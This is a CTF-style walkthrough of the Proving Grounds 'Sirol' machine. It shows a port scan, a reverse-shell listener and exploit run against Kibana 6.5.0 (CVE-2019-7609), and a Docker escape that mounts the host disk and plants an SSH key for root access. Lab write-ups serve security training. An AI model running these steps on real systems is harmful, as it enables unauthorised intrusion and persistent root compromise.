📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Web enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. Proving Grounds - Practice

Sirol

PreviousUT99NextTwiggy

Last updated 3 years ago

Was this helpful?

nmap

nmap
sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Kibana is running on port 5601

Web enumeration

Looks like Kibana is running on version 6.5.0 which is vulnerable to Remote Code Execution.

Exploitation

Visit https://github.com/LandGrey/CVE-2019-7609/ and copy the python exploit to your local machine.

Set a reverse shell listener

sudo nc -lvnp 80

Run the exploit

python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shell

And you should receive a root shell inside a Docker container.

Privilege Escalation

Looks like --privilege flag is set since we can run fdisk -l

Let's mount /dev/sda1 

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Create .ssh folder on /root 

cd /mnt/hola/root
mkdir .ssh
cd .ssh

Copy your .ssh/id_rsa.pub and paste it to the remote machine's .ssh/authorized_keys

echo 'insert your public ssh key' > authorized_keys

Now you can SSH directly to the machine and escape the container.

Thanks for reading and enjoy the rest of your day!